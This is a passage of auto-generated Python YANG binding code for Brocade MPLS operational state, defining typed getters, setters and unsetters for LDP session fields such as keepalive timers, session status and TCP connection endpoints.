try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-hold", rest_name="max-hold", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """max_hold must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-hold", rest_name="max-hold", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__max_hold = t
if hasattr(self, '_set'):
self._set()
def _unset_max_hold(self):
self.__max_hold = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-hold", rest_name="max-hold", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_time_left(self):
"""
Getter method for time_left, mapped from YANG variable /mpls_state/ldp/ldp_session/time_left (uint32)
YANG Description: timeLeft
"""
return self.__time_left
def _set_time_left(self, v, load=False):
"""
Setter method for time_left, mapped from YANG variable /mpls_state/ldp/ldp_session/time_left (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_time_left is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_time_left() directly.
YANG Description: timeLeft
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="time-left", rest_name="time-left", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """time_left must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="time-left", rest_name="time-left", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__time_left = t
if hasattr(self, '_set'):
self._set()
def _unset_time_left(self):
self.__time_left = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="time-left", rest_name="time-left", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_session_status(self):
"""
Getter method for session_status, mapped from YANG variable /mpls_state/ldp/ldp_session/session_status (string)
YANG Description: sessionStatus
"""
return self.__session_status
def _set_session_status(self, v, load=False):
"""
Setter method for session_status, mapped from YANG variable /mpls_state/ldp/ldp_session/session_status (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_session_status is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_session_status() directly.
YANG Description: sessionStatus
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="session-status", rest_name="session-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """session_status must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="session-status", rest_name="session-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__session_status = t
if hasattr(self, '_set'):
self._set()
def _unset_session_status(self):
self.__session_status = YANGDynClass(base=unicode, is_leaf=True, yang_name="session-status", rest_name="session-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_local_ldp_id(self):
"""
Getter method for local_ldp_id, mapped from YANG variable /mpls_state/ldp/ldp_session/local_ldp_id (string)
YANG Description: localLdpId
"""
return self.__local_ldp_id
def _set_local_ldp_id(self, v, load=False):
"""
Setter method for local_ldp_id, mapped from YANG variable /mpls_state/ldp/ldp_session/local_ldp_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_ldp_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_ldp_id() directly.
YANG Description: localLdpId
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="local-ldp-id", rest_name="local-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_ldp_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="local-ldp-id", rest_name="local-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__local_ldp_id = t
if hasattr(self, '_set'):
self._set()
def _unset_local_ldp_id(self):
self.__local_ldp_id = YANGDynClass(base=unicode, is_leaf=True, yang_name="local-ldp-id", rest_name="local-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_local_lblspc_id(self):
"""
Getter method for local_lblspc_id, mapped from YANG variable /mpls_state/ldp/ldp_session/local_lblspc_id (string)
YANG Description: local_lblspc_id
"""
return self.__local_lblspc_id
def _set_local_lblspc_id(self, v, load=False):
"""
Setter method for local_lblspc_id, mapped from YANG variable /mpls_state/ldp/ldp_session/local_lblspc_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_lblspc_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_lblspc_id() directly.
YANG Description: local_lblspc_id
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="local-lblspc-id", rest_name="local-lblspc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_lblspc_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="local-lblspc-id", rest_name="local-lblspc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__local_lblspc_id = t
if hasattr(self, '_set'):
self._set()
def _unset_local_lblspc_id(self):
self.__local_lblspc_id = YANGDynClass(base=unicode, is_leaf=True, yang_name="local-lblspc-id", rest_name="local-lblspc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_next_keepalive(self):
"""
Getter method for next_keepalive, mapped from YANG variable /mpls_state/ldp/ldp_session/next_keepalive (uint32)
YANG Description: nextKeepalive
"""
return self.__next_keepalive
def _set_next_keepalive(self, v, load=False):
"""
Setter method for next_keepalive, mapped from YANG variable /mpls_state/ldp/ldp_session/next_keepalive (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_next_keepalive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_next_keepalive() directly.
YANG Description: nextKeepalive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="next-keepalive", rest_name="next-keepalive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """next_keepalive must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="next-keepalive", rest_name="next-keepalive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__next_keepalive = t
if hasattr(self, '_set'):
self._set()
def _unset_next_keepalive(self):
self.__next_keepalive = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="next-keepalive", rest_name="next-keepalive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_entity_index(self):
"""
Getter method for entity_index, mapped from YANG variable /mpls_state/ldp/ldp_session/entity_index (uint32)
YANG Description: entityIndex
"""
return self.__entity_index
def _set_entity_index(self, v, load=False):
"""
Setter method for entity_index, mapped from YANG variable /mpls_state/ldp/ldp_session/entity_index (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_entity_index is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_entity_index() directly.
YANG Description: entityIndex
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="entity-index", rest_name="entity-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """entity_index must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="entity-index", rest_name="entity-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__entity_index = t
if hasattr(self, '_set'):
self._set()
def _unset_entity_index(self):
self.__entity_index = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="entity-index", rest_name="entity-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_targeted_adj_added(self):
"""
Getter method for targeted_adj_added, mapped from YANG variable /mpls_state/ldp/ldp_session/targeted_adj_added (string)
YANG Description: targetedAdjAdded
"""
return self.__targeted_adj_added
def _set_targeted_adj_added(self, v, load=False):
"""
Setter method for targeted_adj_added, mapped from YANG variable /mpls_state/ldp/ldp_session/targeted_adj_added (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_targeted_adj_added is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_targeted_adj_added() directly.
YANG Description: targetedAdjAdded
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="targeted-adj-added", rest_name="targeted-adj-added", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """targeted_adj_added must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="targeted-adj-added", rest_name="targeted-adj-added", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__targeted_adj_added = t
if hasattr(self, '_set'):
self._set()
def _unset_targeted_adj_added(self):
self.__targeted_adj_added = YANGDynClass(base=unicode, is_leaf=True, yang_name="targeted-adj-added", rest_name="targeted-adj-added", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_is_retry(self):
"""
Getter method for is_retry, mapped from YANG variable /mpls_state/ldp/ldp_session/is_retry (boolean)
YANG Description: isRetry
"""
return self.__is_retry
def _set_is_retry(self, v, load=False):
"""
Setter method for is_retry, mapped from YANG variable /mpls_state/ldp/ldp_session/is_retry (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_is_retry is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_is_retry() directly.
YANG Description: isRetry
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="is-retry", rest_name="is-retry", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """is_retry must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-retry", rest_name="is-retry", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__is_retry = t
if hasattr(self, '_set'):
self._set()
def _unset_is_retry(self):
self.__is_retry = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="is-retry", rest_name="is-retry", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_next_retry(self):
"""
Getter method for next_retry, mapped from YANG variable /mpls_state/ldp/ldp_session/next_retry (uint32)
YANG Description: nextRetry
"""
return self.__next_retry
def _set_next_retry(self, v, load=False):
"""
Setter method for next_retry, mapped from YANG variable /mpls_state/ldp/ldp_session/next_retry (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_next_retry is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_next_retry() directly.
YANG Description: nextRetry
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="next-retry", rest_name="next-retry", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """next_retry must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="next-retry", rest_name="next-retry", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__next_retry = t
if hasattr(self, '_set'):
self._set()
def _unset_next_retry(self):
self.__next_retry = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="next-retry", rest_name="next-retry", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_keepalive_interval(self):
"""
Getter method for keepalive_interval, mapped from YANG variable /mpls_state/ldp/ldp_session/keepalive_interval (uint32)
YANG Description: keepaliveInterval
"""
return self.__keepalive_interval
def _set_keepalive_interval(self, v, load=False):
"""
Setter method for keepalive_interval, mapped from YANG variable /mpls_state/ldp/ldp_session/keepalive_interval (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_keepalive_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_keepalive_interval() directly.
YANG Description: keepaliveInterval
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="keepalive-interval", rest_name="keepalive-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """keepalive_interval must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="keepalive-interval", rest_name="keepalive-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__keepalive_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_keepalive_interval(self):
self.__keepalive_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="keepalive-interval", rest_name="keepalive-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_local_keepalive_timeout(self):
"""
Getter method for local_keepalive_timeout, mapped from YANG variable /mpls_state/ldp/ldp_session/local_keepalive_timeout (uint32)
YANG Description: localKeepaliveTimeout
"""
return self.__local_keepalive_timeout
def _set_local_keepalive_timeout(self, v, load=False):
"""
Setter method for local_keepalive_timeout, mapped from YANG variable /mpls_state/ldp/ldp_session/local_keepalive_timeout (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_keepalive_timeout is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_keepalive_timeout() directly.
YANG Description: localKeepaliveTimeout
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="local-keepalive-timeout", rest_name="local-keepalive-timeout", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_keepalive_timeout must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="local-keepalive-timeout", rest_name="local-keepalive-timeout", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__local_keepalive_timeout = t
if hasattr(self, '_set'):
self._set()
def _unset_local_keepalive_timeout(self):
self.__local_keepalive_timeout = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="local-keepalive-timeout", rest_name="local-keepalive-timeout", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_peer_proposed_keepalive_timeout(self):
"""
Getter method for peer_proposed_keepalive_timeout, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_proposed_keepalive_timeout (uint32)
YANG Description: peerProposedKeepaliveTimeout
"""
return self.__peer_proposed_keepalive_timeout
def _set_peer_proposed_keepalive_timeout(self, v, load=False):
"""
Setter method for peer_proposed_keepalive_timeout, mapped from YANG variable /mpls_state/ldp/ldp_session/peer_proposed_keepalive_timeout (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_peer_proposed_keepalive_timeout is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_peer_proposed_keepalive_timeout() directly.
YANG Description: peerProposedKeepaliveTimeout
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-proposed-keepalive-timeout", rest_name="peer-proposed-keepalive-timeout", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """peer_proposed_keepalive_timeout must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-proposed-keepalive-timeout", rest_name="peer-proposed-keepalive-timeout", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__peer_proposed_keepalive_timeout = t
if hasattr(self, '_set'):
self._set()
def _unset_peer_proposed_keepalive_timeout(self):
self.__peer_proposed_keepalive_timeout = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="peer-proposed-keepalive-timeout", rest_name="peer-proposed-keepalive-timeout", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_session_up_time(self):
"""
Getter method for session_up_time, mapped from YANG variable /mpls_state/ldp/ldp_session/session_up_time (string)
YANG Description: sessionUpTime
"""
return self.__session_up_time
def _set_session_up_time(self, v, load=False):
"""
Setter method for session_up_time, mapped from YANG variable /mpls_state/ldp/ldp_session/session_up_time (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_session_up_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_session_up_time() directly.
YANG Description: sessionUpTime
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="session-up-time", rest_name="session-up-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """session_up_time must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="session-up-time", rest_name="session-up-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__session_up_time = t
if hasattr(self, '_set'):
self._set()
def _unset_session_up_time(self):
self.__session_up_time = YANGDynClass(base=unicode, is_leaf=True, yang_name="session-up-time", rest_name="session-up-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_md5_auth_key(self):
"""
Getter method for md5_auth_key, mapped from YANG variable /mpls_state/ldp/ldp_session/md5_auth_key (string)
YANG Description: md5AuthKey
"""
return self.__md5_auth_key
def _set_md5_auth_key(self, v, load=False):
"""
Setter method for md5_auth_key, mapped from YANG variable /mpls_state/ldp/ldp_session/md5_auth_key (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_md5_auth_key is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_md5_auth_key() directly.
YANG Description: md5AuthKey
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="md5-auth-key", rest_name="md5-auth-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """md5_auth_key must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="md5-auth-key", rest_name="md5-auth-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__md5_auth_key = t
if hasattr(self, '_set'):
self._set()
def _unset_md5_auth_key(self):
self.__md5_auth_key = YANGDynClass(base=unicode, is_leaf=True, yang_name="md5-auth-key", rest_name="md5-auth-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_tcp_conn_local(self):
"""
Getter method for tcp_conn_local, mapped from YANG variable /mpls_state/ldp/ldp_session/tcp_conn_local (string)
YANG Description: tcpConnLocal
"""
return self.__tcp_conn_local
def _set_tcp_conn_local(self, v, load=False):
"""
Setter method for tcp_conn_local, mapped from YANG variable /mpls_state/ldp/ldp_session/tcp_conn_local (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_tcp_conn_local is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tcp_conn_local() directly.
YANG Description: tcpConnLocal
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="tcp-conn-local", rest_name="tcp-conn-local", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tcp_conn_local must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-conn-local", rest_name="tcp-conn-local", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__tcp_conn_local = t
if hasattr(self, '_set'):
self._set()
def _unset_tcp_conn_local(self):
self.__tcp_conn_local = YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-conn-local", rest_name="tcp-conn-local", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_tcp_conn_remote(self):
"""
Getter method for tcp_conn_remote, mapped from YANG variable /mpls_state/ldp/ldp_session/tcp_conn_remote (string)
YANG Description: tcpConnRemote
"""
return self.__tcp_conn_remote
def _set_tcp_conn_remote(self, v, load=False):
"""
Setter method for tcp_conn_remote, mapped from YANG variable /mpls_state/ldp/ldp_session/tcp_conn_remote (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_tcp_conn_remote is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tcp_conn_remote() directly.
YANG Description: tcpConnRemote
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="tcp-conn-remote", rest_name="tcp-conn-remote", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tcp_conn_remote must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="tcp-conn-remote", rest_name="tcp-conn-remote", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__tcp_conn_remote = t
